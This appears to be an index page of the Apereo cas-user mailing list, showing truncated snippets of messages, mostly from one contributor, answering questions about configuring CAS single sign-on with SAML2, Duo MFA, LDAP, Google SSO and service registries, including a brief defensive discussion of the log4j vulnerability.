Re: [cas-user] CAS accessibility to people with disabilities

On Fri, 2023-08-04 at 02:52 -0700, Jean-Paul JORDA wrote: Hi, We use apereo CAS for our applications, but unfortunately the login page is not accessible to people with disabilities. That's a problem for these people of course, and what's more we a bound by law to provide accessible web sites

Re: [cas-user] ERROR CAS 6.1 SAML IDP GOOGLE

Typically the helpful bit in a long stack like this is at the end Error:     Caused by: java.net.MalformedURLException: no protocol: login.unila.ac.id/cas         at java.base/java.net.URL.(URL.java:627)         at java.base/java.net.URL.(URL.java:523)         at

[cas-user] REST attribute resolution and filtering

I am trying to retrieve one specific attribute from a REST end point. I have it connecting to it. However, I only have one service that should get this attribute, and thus I only need to connect to the REST attribute store for that one service. How do I configure this in my service definition?

[cas-user] Public workstation functionality doesn't work with Duo Universal Prompt

I have two otherwise identically configured CAS configurations, both on 6.6.6. Both are configured to use Duo, and both of them have the public workstation checkbox in the login form. The only difference between the two is that one uses the iframe Duo integration and one uses the Universal

Re: [cas-user] Re: CAS Client help

APIs are handled differently from SPAs. You probably need to look at the CAS REST protocol? https://apereo.github.io/cas/6.6.x/protocol/REST-Protocol.html I would put APIs behind an API gateway. Conceptually they are the same thing as CAS + AD, but specifically designed for API calls,

Re: [cas-user] Install CAS on Ubuntu (implement SSO system using OpenLDAP)

Not sure why that isn't starting up. I launch it differently with a java -jar command. Good resource for getting going: https://fawnoos.com/2022/03/04/cas65-gettingstarted-overlay/ That is for 6.5, but I think everything holds for 6.6. It also has different instructions for launching. On

Re: [cas-user] Duo Universal Prompt behind proxy

On 3/8/23 12:59, 'Richard Frovarp' via CAS Community wrote: On CAS 6.6.6 and using the Duo Universal Prompt, it is exposing my internal hostname, rather than the load balancer. It's not clear to me why this is happening. It is also not clear to me what the correct configuration options

[cas-user] Duo Universal Prompt behind proxy

On CAS 6.6.6 and using the Duo Universal Prompt, it is exposing my internal hostname, rather than the load balancer. It's not clear to me why this is happening. It is also not clear to me what the correct configuration options are for a load balanced CAS with respect to hostname / proxy

Re: [cas-user] SAML IdP keys and metadata problems

location cas thinks is correct. Not sure about the exception. Perhaps it is missing something related to git; path, write permissions, initialized repo, etc. Ray On Fri, 2023-01-06 at 15:42 -0600, 'Richard Frovarp' via CAS Community wrote: Notice: This message was sent from outside the University

[cas-user] SAML IdP keys and metadata problems

I'm having two different problems related to SAML 2 keys and metadata on 6.6.3. If I have org.apereo.cas:cas-server-support-saml-idp-metadata-git enabled, I get an NPE when trying to access the metadata URL. I have enforced the default false flag to indicate that the IdP metadata shouldn't

Re: [cas-user] Using git on multiple repos

d. On Fri, Dec 23, 2022 at 5:28 AM 'Richard Frovarp' via CAS Community wrote: That could also work. Thanks. On 12/22/22 07:50, Misagh wrote: Did you mean this? https://apereo.github.io/cas/6.6.x/installation/Configuring-SAML2-DynamicMetadata-Git.html On Thu, Dec 22, 2022 at 4:52 AM 'Richard Fr

Re: [cas-user] Using git on multiple repos

That could also work. Thanks. On 12/22/22 07:50, Misagh wrote: Did you mean this? https://apereo.github.io/cas/6.6.x/installation/Configuring-SAML2-DynamicMetadata-Git.html On Thu, Dec 22, 2022 at 4:52 AM 'Richard Frovarp' via CAS Community wrote: Is it possible to have CAS use two different

[cas-user] Re: Using git on multiple repos

I discovered that the git service repository is not recursive. So, I can put the hand maintained metadata in a subdirectory in the repo, and we are good. From: 'Richard Frovarp' via CAS Community Sent: Tuesday, December 20, 2022 2:52:21 PM To: cas-user@apereo.org

[cas-user] Using git on multiple repos

Is it possible to have CAS use two different repos, with one of them NOT being services in 6.6? I have a repo of all of my hand maintained metadata that isn't in the same repo as the JSON files for service configuration. Thanks, Richard -- - Website: https://apereo.github.io/cas - Gitter

Re: [cas-user] CAS SSL - How to send SSL Certificate Chain?

, 'Richard Frovarp' via CAS Community wrote: Browsers will insert the intermediate certificates if they know them. So you can't trust the browser. Scanners look for the chain with no prior knowledge, and thus are more reliable in determining if you have everything setup correctly. On 11/3/22 12:47, Ray

Re: [cas-user] CAS SSL - How to send SSL Certificate Chain?

Browsers will insert the intermediate certificates if they know them. So you can't trust the browser. Scanners look for the chain with no prior knowledge, and thus are more reliable in determining if you have everything setup correctly. On 11/3/22 12:47, Ray Bon wrote: Michael, I have not

[cas-user] Metrics prefix for 6.6?

Is there a metrics prefix for StatsD (or any of the other ones) that we can provide? Generally we run one StatsD for multiple systems, and it not using a prefix to group it together is going to make things complicated / impossible. There used to be one, but I can't seem to find anything in the

Re: [cas-user] Re: Older documentation is no longer available

On Tue, 2022-11-01 at 09:06 -0400, Mark H. Wood wrote: > On Mon, Oct 31, 2022 at 03:25:12PM -0700, Benjamin Bini wrote: > > Which project removes documentation as a way to encourage people to > > upgrade? > > What is the next step? Removing the code from GitHub and removing > > artifacts > > from

Re: [cas-user] renew=true, risk of bypassing?

Part of the response metadata coming back is if the authentication is from a new login. I think it will also tell you what time the auth happened. Don't trust the user provided data, validate that what CAS is telling you matches your security requirement. If it doesn't, don't let them pass.

Re: [cas-user] CAS 6.5 w/ Duo MFA, was MFA actually used?

How are you triggering MFA / Duo? You likely only want to trigger Duo on a local attribute and setup the integration to force Duo always. If you are leaving it up to Duo to decide if the user is enrolled and bypass if not, the old Duo Web integration couldn't tell you what happen, just that

Re: [cas-user] ideas for persistence login session

Amazon stores a decent amount of info at the account layer. Different application sessions across different devices share cart. But the solution for this is to do it at the application layer. Extend the session out there. Then at the security layer, it should have the functionality to know

Re: [cas-user] ideas for persistence login session

I would change the application and not do it via CAS. Changing the application session timeout to what they want. Because otherwise it will do a SSO session again, which will interrupt anything the end user is trying to do with the browser open for the past two days. So anything done via CAS

Re: [cas-user] Re: Migrating services from version 5 to 6

The tables in the post are for the service registry. If you don't migrate those, you will have to reconfigure from scratch. I do not know what the plans are for the project with respect to the service registry. It's changed a bit between versions, and usually seems like a pain. We made the

Re: [cas-user] MFA with Duo - A Lot Of Failures

Looks like the clock on your server isn't correct? 2022-02-17 20:14:10,479 ERROR [org.apereo.cas.adaptors.duo.authn.DuoSecurityAuthenticationHandler] - Caused by: com.auth0.jwt.exceptions.InvalidClaimException: The Token can't be used before Thu Feb 17 20:15:11 UTC 2022. I don't know about

Re: [cas-user] log4j2 vulnerability

Newer version of the JDK are still affected. The newer JDK versions stop JNDI from running remote code, it doesn't stop JNDI lookup. An attacker can still exfil data through the DNS lookup. Also, there are other paths to exploit with this attack. It was first found via JNDI LDAP to execute

Re: [cas-user] log4j vulnerability

to "true" in the log4j2.xml config file might do to trick. I'm guessing we'd do that somewhere here at the top?             /etc/cas/logs         On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community mailto:cas-user@apereo.org>> wrote: Using a ne

Re: [cas-user] log4j vulnerability

Using a new enough version of the JDK might also alleviate it? The other option is to throw the config option at the JDK to stop it from happening. That would seem to be easiest. On 12/10/21 12:36 PM, King, Robert wrote: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 Has

Re: [cas-user] Clarification on ADFS/CAS integration possibilities

"I understand you can make CAS use ADFS for backend authentication, or vise-a-versa, but i'm not sure that's exactly what i'm asking here... or is it?" Yes, that is what you are asking. Otherwise they are two independent applications that know nothing about the state of one another, even

[cas-user] Re: Trimming username for attribute resolution

The issue is that this happens before the service release policy can trigger. For some reason it is going against AD with 'richard.frovarp ', which results in a failed AD lookup. So it can't even get the extra attributes to return. So it appears that the result of the principal transformation

[cas-user] Trimming username for attribute resolution

What's the way to do that? I thought I figured that out, but it turns out I haven't. I think one of my systems is accomplishing it via JS in the page. Another CAS instance for a different org doesn't have that JS. Random trailing spaces is causing attribute resolution to fail. Somehow

Re: [cas-user] Re: CAS vs Spring Security PLUS CAS

Fernando's message below is great advice. The version of the CAS server isn't going to matter too terribly much. It will depend on what protocol you are planning to use against CAS. I'm going to guess CAS Protocol v3, which gives you everything you need. You are going to want a security

Re: [cas-user] Re: Spring Security integration doubts (With JDBC)

CAS can do multifactor. It can also release a bunch of attributes about how the authentication went if you use the CAS 3 protocol. The service directing the individual to CAS can also request that a fresh login is used. Combined together, the service can be assured (so long as they trust the

Re: [cas-user] CAS Authentication issue

Looks like it can't find the table?? Are there any tables in your DB? Is your DB named vantage? You'll need to refer to the docs on how to get it to create the tables if they aren't there. If they are there in that DB, I'm not sure. You are on an ancient version of CAS. If this is setting it up

Re: [cas-user] Re: Guide to Deploying CAS 6 - with Ansible, MFA, and Delegated authentication

Yes, very nicely done. I too will find the Azure bit helpful when I spin up a social CAS instance in the future. Richard On Thu, 2021-05-13 at 21:59 -0700, Andy Ng wrote: Hi Paul, Thanks for the contribution! We soon also need to setup delegate auth to Azure, so that section is going to be

Re: [cas-user] Failed Login Attempts

Don't get me wrong, throttling is definitely good. The thing you want to watch out for is when unexpected attempts succeed. So one bit of strange behavior to be on the lookout for is an authentication that triggers MFA, but the MFA success never happens. It will depend on your MFA solution.

Re: [cas-user] Failed Login Attempts

Adding user won't catch a spray over different usernames. I just use rate throttling as well. And yeah, if they go down to 1 per second, you'll never catch them with the throttle. You also won't catch them if they come at you with hundreds of IPs. On Mon, 2021-05-17 at 16:40 +, Ray Bon

Re: [cas-user] SAML2 request POST vs GET CAS 5.3.14??

614 DEBUG [org.apereo.cas.web.FlowExecutionExceptionResolver] - org.apereo.cas.support.saml.SamlException: Signing credentials for validation could not be resolved based on the provided signature Keith Alston Regent University IT Department keit...@regent.edu 757.619.3421 ____ From: 'Richar

Re: [cas-user] SAML2 request POST vs GET CAS 5.3.14??

t; : { "@class" : "java.util.TreeMap", "ExtensionAttribute1" : "Email", "givenname" : "FirstName", "sn" : "LastName" } } } Keith Alston Regent University IT Department keit...@regent

Re: [cas-user] SAML2 request POST vs GET CAS 5.3.14??

Since I saw someone create the URL by hand the other day, I'm going to ask the simple question: is the request hitting the HTTP-POST binding location? POST and Redirect are two different URLs in CAS (and I'm guessing most IdPs). I've never had to do anything different to handle the two

Re: [cas-user] No registered service found/Freshworks SAML2/ CAS 5.3

Or rather serviceId : instead of the regex you have there. On Mon, 2021-04-12 at 18:50 +, 'Richard Frovarp' via CAS Community wrote: Don't do a regex for the serviceId for SAML2. Do the entityId instead. On Mon, 2021-04-12 at 18:46 +, Keith Alston (Staff) wrote: Any ideas on what

Re: [cas-user] No registered service found/Freshworks SAML2/ CAS 5.3

Don't do a regex for the serviceId for SAML2. Do the entityId instead. On Mon, 2021-04-12 at 18:46 +, Keith Alston (Staff) wrote: Any ideas on what might be going on here? I get the "Application Not Authorized to Use CAS" page when redirected to CAS. 2021-04-12 14:21:32,474 WARN

Re: [cas-user] CAS 5.2.9 Authenticating LDAP users outside baseDn

My guess is that the bind user is going to ignore the base DN as it happens before the search is done. As for the rest, it likely should follow the base DN. You may have something effectively double defined there that is causing it to work outside. I'm not sure what the dnFormat parameter does.

Re: [cas-user] CAS 6.3 + SAML

If I'm understanding you correctly, I've never done it that way. You are saying that you have an attribute already setup called sAMAccountName right? And you want to release it to this system as domain\sAMAcountName as userID? I've always done such a thing via Groovy attribute return with

Re: [cas-user] CAS 6.3 + SAML

The IdP automatically generates metadata. And the correct endpoints are listed on this page, including the metadata endpoint: https://apereo.github.io/cas/6.3.x/installation/Configuring-SAML2-Authentication.html Usually with SAML you provide the SP with a copy of your metadata, ideally loaded

Re: [cas-user] CAS 6.3 + SAML

Did you provide the app your IdP generated metadata or provide the SP with the information in a different method? As that's the wrong end point for the SP to be sending you to: https://apereo.github.io/cas/6.3.x/installation/Configuring-SAML2-Authentication.html On Wed, 2021-03-17 at 06:21

Re: [cas-user] InCommon and NIH changes

I'm running my InCommon membership through Shibboleth, so I'm not looking for a CAS solution. However, here is what I know: 1) R is documented as you point out. If you are going to provide REFEDS R to REFEDS R SPs, you probably want to go into the InCommon Federation Manager and assert that

Re: [cas-user] Sample SAML2 service definition for Google Apps?

-0800, Mike Osterman wrote: Thanks, Richard! On Wed, Mar 10, 2021 at 2:40 PM 'Richard Frovarp' via CAS Community mailto:cas-user@apereo.org>> wrote: Get a test instance. It's pretty easy to do. Takes a little bit, but easy to do. You really only need one or two users in it to test

Re: [cas-user] Sample SAML2 service definition for Google Apps?

Get a test instance. It's pretty easy to do. Takes a little bit, but easy to do. You really only need one or two users in it to test anyway. There is a previous post on this list on how to do it the new way. I have internal documentation that I can turn into external documentation tonight and

Re: [cas-user] Re: Per Service Ticket Expiration in 5.2.x?

, 'Richard Frovarp' via CAS Community wrote: > It's doing something with Single Logout. Turn it off / block it, or > something: > > https://community.canvaslms.com/t5/Integration-Documents/Configuring-CAS-and-Canvas-Authentication/ta-p/387390 > > Look at the end for "User

Re: [cas-user] Re: Per Service Ticket Expiration in 5.2.x?

It's doing something with Single Logout. Turn it off / block it, or something: https://community.canvaslms.com/t5/Integration-Documents/Configuring-CAS-and-Canvas-Authentication/ta-p/387390 Look at the end for "User is randomly logged out of Canvas" On Fri, 2021-03-05 at 12:41 -0800, Mike

Re: [cas-user] Re: Per Service Ticket Expiration in 5.2.x?

On Fri, 2021-03-05 at 11:20 -0800, Bill Scully wrote: Does single logout trigger upon CAS session expiration? I would expect not, but maybe there's a setting to flip that? Or maybe something else is triggering single logout at two hours, and that is triggering Canvas? According to Instructure

Re: [cas-user] Re: Per Service Ticket Expiration in 5.2.x?

Does single logout trigger upon CAS session expiration? I would expect not, but maybe there's a setting to flip that? Or maybe something else is triggering single logout at two hours, and that is triggering Canvas? On Fri, 2021-03-05 at 22:49 +0400, Misagh wrote: > > Instructure's Canvas (LMS)

Re: [cas-user] Unable to get UID attribute in client side

I don't remember the fine specifics of the logs well enough to know. It's possible that both are at fault? Make sure you are listing attributes to lookup in your ldap attribute repository configuration. If they aren't there, that'll be problem one. The other thing is that by default the CAS 2

Re: [cas-user] Question about using CAS with LDAP...?

configuration. I'm guessing you can't anonymous bind to LDAP from HTTPD. On Fri, 2021-02-12 at 15:10 +, 'Richard Frovarp' via CAS Community wrote: I wouldn't mix the two methods. There's probably a way to make that work, but that's an HTTPD question, not a CAS question. You can have CAS

Re: [cas-user] Question about using CAS with LDAP...?

I wouldn't mix the two methods. There's probably a way to make that work, but that's an HTTPD question, not a CAS question. You can have CAS authenticate against LDAP from the CAS IdP. That can either then return the list of attributes to have mod_auth_cas filter on. Or you can have the IdP do

Re: [EXTERNAL SENDER] Re: [cas-user] CAS 5.0.x newer ldaptive?

at 5:20 AM 'Richard Frovarp' via CAS Community mailto:cas-user@apereo.org>> wrote: Sorry, you don't need it in 5.3 as that one is default. So I didn't see that in my dependencies. You'll need the ldaptive dependency for that. You'll want to match version to the other ldaptive version you h

Re: [EXTERNAL SENDER] Re: [cas-user] CAS 5.0.x newer ldaptive?

figuration-Properties-Common.html#ldap-connection-settings but this property is also listed in the 5.0.x properties <https://apereo.github.io/cas/5.0.x/installation/Configuration-Properties.html> On Thu, Jan 28, 2021 at 11:18 AM 'Richard Frovarp' via CAS Community mailto:cas-user@apereo.org>>

Re: [cas-user] CAS 5.0.x newer ldaptive?

I'm guessing that it just doesn't exist anymore. Browsing from https://repo.spring.io/snapshot/ They don't have anything for Duo that is obvious. It was a SNAPSHOT dependency, and thus shouldn't have been used in anything released. I see in my pom: org.apereo.cas

Re: [cas-user] CAS 5.0.x newer ldaptive?

You have to do overlay exclusions. Which for me looks like. Obviously close the XML out as appropriate. I have further build plugins. maven-war-plugin 2.6 false false false ${project.build.directory}/war/work/org.apereo.cas/cas-server-webapp/META-INF/MANIFEST.MF org.apereo.cas

Re: [cas-user] CAS 5.0.x newer ldaptive?

For the Duo jar, you should put them in your own local repo? Or maybe the cache dir? I know that by default it feels like you have to hunt through a variety of external repos to find that dependency. I run a local Nexus install for us so I only have to hunt down once. For the LDAP problems, I

Re: [cas-user] 3.5.2 Oracle DB compatibility

Maybe? That version was released nearly 7 years ago and isn't supported. I would suggest moving to CAS 6.3. On Thu, 2021-01-21 at 17:05 -0800, Kylie L wrote: Will CAS 3.5.2 work with an Oracle 19c or 18c database? Thanks -- - Website: https://apereo.github.io/cas - Gitter Chatroom:

Re: [cas-user] Getting 403 when POST to /cas endpoint

So you want to turn CAS into a SAML 2 SP? You'll need to follow this documentation: https://apereo.github.io/cas/5.3.x/integration/Delegate-Authentication.html On Thu, 2021-01-21 at 17:09 -0800, Yan Zhou wrote: > Hi, > > Try to implement this: people logged into their app (that does not > use

Re: [cas-user] Getting 403 when POST to /cas endpoint

Why are you trying to POST to the login URL? It looks like this isn't the POST from the login page? What do the CAS logs say? On Thu, 2021-01-21 at 15:27 -0800, Yan Zhou wrote: > Hello, > > i am using CAS 5.3.X, but I think the same would apply to CAS4 or > CA5. > >

Re: [cas-user] Managing Services with JPA (SQL)

I believe that it is serialized Java classes. So it's binary data. You don't change it without an external service. I guess you could find the code that does it and write you own service. But you don't be doing it via direct DB manipulation. On Fri, 2020-12-04 at 09:48 +, Francisco

Re: [cas-user] cas Java installation

You would normally use it with your favorite security library in Java. Common ones include Apache Shiro, Pac4J, and Spring Security. From there use the library specific instructions for bringing in the CAS client library. On Thu, 2020-12-03 at 13:23 +0530, rohini bansode wrote: > IF you have some

Re: [cas-user] Wrong user authenticated

Probably not? That sounds like code that is being hit somewhere that isn't thread safe. The built in LDAP code to CAS should be just fine with that respect. Assuming you're using a well supported LDAP server that wouldn't have thread issues? I don't know how a HTTP proxy would impact this. I

Re: [cas-user] Configure SAML2 IdP functionality to provide SSO for G Suite

The cert you were using under the old integration likely doesn't match your SAML cert. You would need to upload your new SAML cert to Google. And yeah, you want to remove the old bits of the old method, in particular the jars associated with it as it fires before the generic SAML can. On Tue,

Re: [cas-user] Google SSO

without typos, I was able to successfully logout from both CAS and Google mail. -Jeremiah Garmatter, Systems Administrator -Ohio Northern University, Class of 2020 -Work: 419-772-1074 Cell: 419-672-8685 -j-gar...@onu.edu On Mon, Aug 17, 2020 at 11:52 AM Richard Frovarp wrote: I haven

Re: [cas-user] Google SSO

419-672-8685 -j-gar...@onu.edu On Fri, Aug 14, 2020 at 12:06 PM Richard Frovarp wrote: I think that's controlled by the metadata, and my notes below say 1.1 unspecified. On Fri, 2020-08-14 at 12:03 -0400, Jeremiah Garmatter wrote: Ah, I see now. I should have mentioned that, in our case, the use

Re: [cas-user] CAS Management not starting

You probably aren't waiting long enough? 2020-08-17 09:06:54,686 DEBUG [org.apache.http.impl.execchain.MainClientExec] - Executing request GET /actuator/discoveryProfile HTTP/1.1 It's trying to make a connection to your CAS system. Looks like from your logs it hasn't time out, and thus hasn't

Re: [cas-user] Google SSO

On Fri, Aug 14, 2020 at 10:24 AM Richard Frovarp mailto:richard.frov...@ndsu.edu>> wrote: Yeah, you'll need to treat it like any other SAML2 service, including using the SamlRegisteredService configuration. Not entirely sure about attribute release. In our case, releasing the default userna

Re: [cas-user] Google SSO

Yeah, you'll need to treat it like any other SAML2 service, including using the SamlRegisteredService configuration. Not entirely sure about attribute release. In our case, releasing the default username is all we need to make it work. But it should be like any other SAML2 service. The

Re: [cas-user] Google SSO

No, there isn't You configure it as a SAML 2 provider. This means you have to craft the metadata by hand. Also, it is beyond deprecated as it will kill your other SAML integrations. So it's best to just do a pure SAML setup with it. Here's the draft set of instructions I put together. I need to

Re: [cas-user] CAS Management UI Question

https://apereo.github.io/cas-management/5.3.x/installation/Installing-ServicesMgmt-Webapp.html#available-attributes On Mon, 2020-07-20 at 09:14 -0600, Bryan Wooten wrote: How do I

Re: [cas-user] same user with 2 logins and MFA

https://apereo.github.io/cas/5.1.x/installation/Configuration-Properties.html > ) but is documented absolutely nowhere? > > As you can see, I'm quite lost. I try to do my home work but the lack > of documentation is really a problem. > > regards > > Patrick Proniewski

Re: [cas-user] same user with 2 logins and MFA

gt; > > cas.authn.mfa.globalPrincipalAttributePredicate=file:/etc/cas/mfaGroo > vyPredicate.groovy > > > but this file is basically default/useless AFAIK. > > > As far as I understand, MFA in CAS uses "{user}" as key instead of > retrieving and using the value of uid from LDAP. That migh

Re: [cas-user] same user with 2 logins and MFA

t me know. > > Regards, > > Patrick Proniewski > -- > Chef du Service Opérations ~ DSI ~ Université Lyon 2 > Responsable de la Sécurité des Systèmes d'Information > > > De : cas-user@apereo.org de la part de Richard > Frovarp >

Re: [cas-user] same user with 2 logins and MFA

You are going to need to provide more details. How are you triggering MFA? What MFA solution are you using? Etc. Something isn't matching, but not knowing what you are matching on when it works just leaves a bunch of guesses. On Wed, 2020-07-15 at 16:20 +0200, Patrick Proniewski wrote: > Hello, >

Re: [cas-user] JDBC attribute SQL query

cas.authn.attribute-repository.jdbc[0].case-canonicalization=NONE|LOWER|UPPER It's been a while since we haven't used canonicalization, so I can't remember the details (like CAS 3.4). However, it used to be that CAS would return back the username attribute case matching whatever the user typed

Re: [cas-user] How do you set the ticket generator?

to have a line about this in the Configuring Ticketing Components area. On Mon, 2020-06-08 at 21:09 +, Richard Frovarp wrote: > I need to add a suffix to the service ticket that is being generated. > I > see in the code that it is in the code, but I have no idea where to > begin to

[cas-user] How do you set the ticket generator?

I need to add a suffix to the service ticket that is being generated. I see in the code that it is in the code, but I have no idea where to begin to make changes to configuration. I can do it either globally or per service, that doesn't matter. I have some code that is looking at the suffix to

Re: [cas-user] Logging "Application Not Authorized to Use CAS"

Example entry: [33m2020-05-22 09:43:51,450 WARN [org.apereo.cas.web.flow.ServiceAuthorizationCheck] - https://frovarp.com] is not found in service registry.> On Fri, 2020-05-22 at 14:16 +0000, Richard Frovarp wrote: > That's logged at the default logging level in cas.log. I don't >

Re: [cas-user] Logging "Application Not Authorized to Use CAS"

That's logged at the default logging level in cas.log. I don't remember what it shows up as, but it is in there. I've used it to find when services make unexpected changes on me. Richard On Fri, 2020-05-22 at 15:39 +0200, spfma.t...@e.mail.fr wrote: > Hi, > Is there a way to log these errors ? I

Re: [cas-user] Handling multiple accounts for one person

We just have separate accounts in AD, which is where we are authenticating and doing attribute release from. The IAM system is responsible for correctly populating the directory and end application if needed in the correct way for each account. This requires multiple accounts and passwords, and

Re: [cas-user] cas5 rebuild and restart for every change??

If you deploy to an external container like Tomcat, you can instead of using the war, explode it into the webapp directory. Wars and jars are just zip files. Or let Tomcat explode it for you the first time, stop Tomcat, then delete war. You can edit content without having to rebuild. I think

Re: [cas-user] Registry service from CAS MANAGEMENT WEB APP to MONGODB

Yeah, there's something odd with the 5.3 version of the manager. Even withe version control bits turned off, it still wants to go to the services-repo directory. Also, with JPA, it doesn't work with the latest server versions of 5.3 for SAML2 services. Not sure if you will see that problem with

Re: [cas-user] How do to G Suite as a normal SAML SP?

to guess and try multiple times. On 3/5/20 1:51 PM, Ray Bon wrote: Richard, There are some online tools that can get you started, https://www.google.com/search?client=ubuntu=fs=saml2+create+metadata=utf-8=utf-8 Ray On Thu, 2020-03-05 at 19:42 +, Richard Frovarp wrote: I'm missing

[cas-user] How do to G Suite as a normal SAML SP?

I'm missing something basic in what it is that I need. We have G Suite setup through the custom bit in CAS. That is conflicting with our other normal SAML SPs and throwing stack traces. I see that in 5.3, the version that we are on, the custom bit has been deprecated. What I'm not able to wrap

[cas-user] CAS Management: How to do authorization?

How does one do authorization checks in CAS Management 5.3.6 using CAS attribute return? In 5.1, I have this: cas.mgmt.adminRoles[0]=CN=,OU=,DC=dc,DC=ndsu,DC=edu cas.mgmt.authzAttributes[0]=memberOf Not entirely sure why that is failing on 5.3.6. Part of me says that it is due to pac4j

Re: [cas-user] Upgrading from 5.1 to 5.3 with JPA service registry and SAML 2 services

,skipGeneratingSubjectConfirmationInResponseTo=0,skipGeneratingSubjectConfirmationNotBefore=1,skipGeneratingSubjectConfirmationNotOnOrAfter=0,skipGeneratingSubjectConfirmationRecipient=0,skipGeneratingTransientNameId=0 where metadataLocation is not null; On 2/5/20 5:36 PM, Richard Frovarp wrote: > Lo

[cas-user] Upgrading from 5.1 to 5.3 with JPA service registry and SAML 2 services

Looks like there was a change to how SAML 2 services were defined in CAS 5.2. So when Hibernate brings those back in, it's failing to create the object. My guess is that since there isn't anything there in the serialized form, it is trying to set a boolean to null, which doesn't work well for

Re: [cas-user] CAS, Chrome 80 and SameSite cookies policy

>From what I gather, it's mostly an SP issue. The SSO part might be an issue >with the IdP, and the fix for it might kill some versions of Safari. It's best >to test with Firefox as it doesn't have a two minute grace period. This is >what I've gleaned from the Shibboleth list. Their

Re: [cas-user] Re: Cas java client

The web.xml file is part of your web application. You need to modify that and include the required jar files. From: cas-user@apereo.org on behalf of KIRTI KHEDKAR Sent: Friday, December 6, 2019 10:09:56 PM To: CAS Community Subject: [cas-user] Re: Cas java

Re: [cas-user] Re: Cas java client

Documentation can be found https://github.com/apereo/java-cas-client/blob/master/README.md Looks to be some good examples https://cuit.columbia.edu/cas-authentication/java From: cas-user@apereo.org on behalf of KIRTI KHEDKAR Sent: Friday, December 6, 2019

Re: [cas-user] Cas java client

That will depend on how you plan to use it. You will need to provide more details. Some of the common ways to use it in Java are the servlet filter, Spring Security, and Apache Shiro. From: cas-user@apereo.org on behalf of KIRTI KHEDKAR Sent: Friday, December

Re: [cas-user] CAS - Form Based Login

Yeah, I think that should work. I've done it once or twice for a web application. You'll have to bring in the CAS Servlet filter to do it. Pretty much everything of mine is using Apache Shiro for security, so I'm not very familiar with the servlet based security constraints.

Re: [cas-user] IAM & SSO

It depends on what you are after. You can do authentication checks for the whole service using the service access strategy: https://apereo.github.io/cas/6.1.x/services/Configuring-Service-Access-Strategy.html You can also do attribute release in a lot of the authentication protocols that CAS

Re: [cas-user] CAS - Form Based Login

The point of doing federated authentication is that you don't login through the application anymore. So you no longer need the login form. It becomes a button like all of the login with Facebook, Google, Twitter, etc options you see on a variety of sites. On 11/20/19 3:10 AM, Steve Cheung

Re: [cas-user] How to install CAS 3.3 with Tomcat 8.0

21:22, Richard Frovarp (mailto:richard.frov...@ndsu.edu>>) escribió: Tomcat 8 is also EOL. On 10/25/19 1:29 PM, Ray Bon wrote: Carlota, Out of curiosity, why are you bound to an ancient, unsupported, and insecure version of CAS? Maven can be downloaded, https://maven.apache.org/ Ha

Re: [cas-user] How to install CAS 3.3 with Tomcat 8.0

The 3.4 method was to create a Maven overlay and build a war from there. I think there was a special config file. Don't remember how that was referenced. You'll need to dig into old documentation. You probably can do it without Maven, but it would be a giant pain. Maven is a build tool and in

  1   2   >